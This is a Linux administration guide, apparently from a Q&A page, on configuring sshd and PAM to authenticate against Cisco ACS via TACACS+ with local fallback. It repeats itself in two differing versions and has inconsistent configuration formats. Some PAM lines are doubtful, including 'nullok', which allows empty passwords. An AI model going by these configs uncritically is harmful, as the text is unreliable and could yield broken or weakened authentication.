How to Configure Linux SSH Daemon (sshd) for TACACS+ Authentication with Cisco ACS Fallback


5 views

For network engineering teams managing multiple Linux servers (syslog collectors, configuration backup systems, TFTP servers), centralizing authentication through Cisco ACS with TACACS+ provides better security and accountability while maintaining local fallback options.

First install the necessary packages on CentOS/RHEL:


yum install -y pam tac_plus openssl gcc make pam-devel
wget https://github.com/kravietz/pam_tacplus/archive/v1.5.1.tar.gz
tar xzf v1.5.1.tar.gz
cd pam_tacplus-1.5.1
./configure
make install

Edit /etc/pam.d/sshd to implement the authentication stack:


#%PAM-1.0
auth       required     pam_sepermit.so
auth       sufficient   /lib64/security/pam_tacplus.so debug server=acs.example.com secret=shared_key timeout=5
auth       include      password-auth
account    required     pam_nologin.so
account    include      password-auth
password   include      password-auth
session    required     pam_selinux.so close
session    required     pam_loginuid.so
session    optional     pam_keyinit.so force revoke
session    include      password-auth

Create /etc/tacplus.conf:


# Primary ACS server
server = acs-primary.example.com {
    secret = YourSharedSecret
    port = 49
    timeout = 5
}

# Secondary ACS server
server = acs-secondary.example.com {
    secret = YourSharedSecret
    port = 49
    timeout = 5
}

Modify /etc/ssh/sshd_config:


UsePAM yes
ChallengeResponseAuthentication yes
AuthenticationMethods keyboard-interactive

Enable debug logging temporarily:


logger -p auth.debug -t PAM-TACPLUS "Starting TACACS+ authentication test"
/usr/sbin/sshd -d -p 2222

Check system logs for authentication attempts:


tail -f /var/log/secure | grep tacplus

The PAM configuration already includes fallback to local authentication through the password-auth include. For more granular control:


auth [success=1 default=ignore] pam_succeed_if.so quiet service in sshd
auth [success=2 auth_err=ignore user_unknown=ignore default=die] pam_tacplus.so debug server=acs.example.com secret=shared_key
auth [default=done] pam_unix.so

1. Always use encrypted channels between Linux servers and ACS
2. Implement proper secret rotation policies
3. Monitor authentication logs for failed attempts
4. Restrict TACACS+ access to specific administrative networks

For network teams managing multiple Linux servers for infrastructure tasks like syslog collection, configuration backups, and TFTP services, centralized authentication is crucial. Here's how to implement TACACS+ authentication through Cisco ACS while maintaining local password fallback.

# Required packages on CentOS/RHEL
yum install -y pam pam-devel gcc make
wget https://github.com/kravietz/pam_tacplus/archive/v1.4.0.tar.gz

tar xzf v1.4.0.tar.gz
cd pam_tacplus-1.4.0
./configure
make
make install

Create /etc/tacacs+/tac_plus.conf:

# Base configuration
server = 192.168.1.10
secret = your_shared_secret
timeout = 10

Edit /etc/pam.d/sshd:

# TACACS+ with local fallback
auth sufficient /lib64/security/pam_tacplus.so server=192.168.1.10 secret=your_shared_secret
auth required pam_unix.so try_first_pass nullok
account required pam_unix.so

Ensure these lines exist in /etc/ssh/sshd_config:

UsePAM yes
ChallengeResponseAuthentication yes
PasswordAuthentication yes

# Test authentication
pamtester sshd username authenticate

# Check logs
tail -f /var/log/secure

For accounting and authorization:

# Additional PAM configuration
session optional /lib64/security/pam_tacplus.so server=192.168.1.10 secret=your_shared_secret accounting

To enable privilege level mapping:

# In tac_plus.conf
service = shell {
    default attribute = permit
    priv-lvl = 15
}

For multiple ACS servers:

# Multiple server configuration
server = 192.168.1.10
server = 192.168.1.11
server = 192.168.1.12